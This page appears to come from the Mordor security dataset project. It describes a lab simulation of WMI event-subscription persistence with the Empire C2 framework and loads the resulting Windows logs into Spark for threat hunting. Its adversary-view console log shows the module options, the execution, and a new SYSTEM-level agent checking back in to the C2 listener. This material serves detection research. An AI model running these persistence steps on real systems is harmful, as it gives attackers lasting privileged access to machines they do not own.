Empire Elevated WMI Eventing¶

Metadata¶


Author	Roberto Rodriguez @Cyb3rWard0g
Creation Date	2019/05/18
Modification Date	2020/09/20
Tactics	[‘TA0003’, ‘TA0004’]
Techniques	[‘T1546.003’]
Tags	[‘Local WMI Eventing’, ‘WMI Event Subscriptions’]

Dataset Description¶

This dataset represents adversaries leveraging WMI subscriptions locally for persistence.

Datasets Downloads¶

Dataset Type	Link
Host	https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/persistence/host/empire_wmi_local_event_subscriptions_elevated_user.zip

Notebooks¶

Notebooks created by the community leveraging the mordor datasets

Author	Name	Link

Simulation Plan¶

Environment	Tool Type	Module
Mordor shire	C2	wmi

Adversary View¶

(Empire: powershell/privesc/bypassuac_fodhelper) > agents
[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
28BNF7RH ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5392   5/0.0    2020-09-04 20:31:17  http            
W2TBCPHU ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       powershell         5584   5/0.0    2020-09-04 20:42:01  http            
13ZK6G7M ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5676   5/0.0    2020-09-04 20:41:59  http            

(Empire: agents) > interact 13ZK6G7M
(Empire: 13ZK6G7M) > 
(Empire: 13ZK6G7M) > usemodule persistence/elevated/wmi*
(Empire: powershell/persistence/elevated/wmi) > info

              Name: Invoke-WMI
            Module: powershell/persistence/elevated/wmi
        NeedsAdmin: True
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None

Authors:
  @mattifestation
  @harmj0y
  @jbooz1

Description:
  Persist a stager (or script) using a permanent WMI
  subscription. This has a difficult detection/removal rating.

Comments:
  https://github.com/mattifestation/PowerSploit/blob/master/Pe
  rsistence/Persistence.psm1

Options:

  Name        Required    Value                     Description
  ----        --------    -------                   -----------
  Agent       True        13ZK6G7M                  Agent to run module on.                 
  Listener    True        http                      Listener to use.                        
  DailyTime   False                                 Daily time to trigger the script        
                                                    (HH:mm).                                
  AtStartup   False       True                      Switch. Trigger script (within 5        
                                                    minutes) of system startup.             
  FailedLogon False                                 Trigger script with a failed logon      
                                                    attempt from a specified user           
  SubName     True        Updater                   Name to use for the event subscription. 
  ExtFile     False                                 Use an external file for the payload    
                                                    instead of a stager.                    
  Cleanup     False                                 Switch. Cleanup the trigger and any     
                                                    script from specified location.         
  UserAgent   False       default                   User-agent string to use for the staging
                                                    request (default, none, or other).      
  Proxy       False       default                   Proxy to use for request (default, none,
                                                    or other).                              
  ProxyCreds  False       default                   Proxy credentials                       
                                                    ([domain\]username:password) to use for 
                                                    request (default, none, or other).      

(Empire: powershell/persistence/elevated/wmi) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 13ZK6G7M to run TASK_CMD_WAIT
[*] Agent 13ZK6G7M tasked with task ID 1
[*] Tasked agent 13ZK6G7M to run module powershell/persistence/elevated/wmi
(Empire: powershell/persistence/elevated/wmi) > 
WMI persistence established using listener http with OnStartup WMI subsubscription trigger.

(Empire: powershell/persistence/elevated/wmi) > 
(Empire: powershell/persistence/elevated/wmi) > 
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent PYA28EDF checked in
[+] Initial agent PYA28EDF from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to PYA28EDF at 172.18.39.5

(Empire: powershell/persistence/elevated/wmi) > 
(Empire: powershell/persistence/elevated/wmi) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
28BNF7RH ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5392   5/0.0    2020-09-04 20:31:17  http            
W2TBCPHU ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       powershell         5584   5/0.0    2020-09-04 20:43:48  http            
13ZK6G7M ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5676   5/0.0    2020-09-04 20:43:48  http            

PYA28EDF ps 172.18.39.5     WORKSTATION5      *THESHIRE\SYSTEM        powershell         7480   5/0.0    2020-09-04 20:49:29  http            

(Empire: agents) > interact PYA28EDF
(Empire: PYA28EDF) > shell whoami
[*] Tasked PYA28EDF to run TASK_SHELL
[*] Agent PYA28EDF tasked with task ID 1
(Empire: PYA28EDF) > 
nt authority\system
..Command execution completed.

(Empire: PYA28EDF) > 
(Empire: PYA28EDF) >

Explore Mordor Dataset¶

Initialize Analytics Engine¶

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File¶

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/persistence/host/empire_wmi_local_event_subscriptions_elevated_user.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")

[+] Processing a Spark DataFrame..
[+] DataFrame Returned !

[+] Temporary SparkSQL View: mordorTable

Get to know your data¶

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)

+---------------------------+------------------------------------+-------+-----+
|Hostname                   |Channel                             |EventID|count|
+---------------------------+------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|12     |18003|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |17918|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|13     |11497|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|7      |9531 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |2785 |
|WORKSTATION5.theshire.local|security                            |5447   |2715 |
|WORKSTATION5.theshire.local|security                            |4658   |2629 |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|10     |1675 |
|WORKSTATION5.theshire.local|security                            |4656   |1361 |
|WORKSTATION5.theshire.local|security                            |4690   |1285 |
|WORKSTATION5.theshire.local|security                            |4663   |1083 |
|WORKSTATION5.theshire.local|security                            |4703   |997  |
|WORKSTATION5.theshire.local|security                            |5156   |482  |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|7      |402  |
|WORKSTATION5.theshire.local|security                            |5158   |372  |
|WORKSTATION5.theshire.local|security                            |4673   |347  |
|MORDORDC.theshire.local    |Security                            |5156   |314  |
|WORKSTATION5.theshire.local|Windows PowerShell                  |800    |286  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|9      |270  |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|12     |252  |
+---------------------------+------------------------------------+-------+-----+
only showing top 20 rows

Bitsadmin Download Malicious File Empire Elevated Scheduled Tasks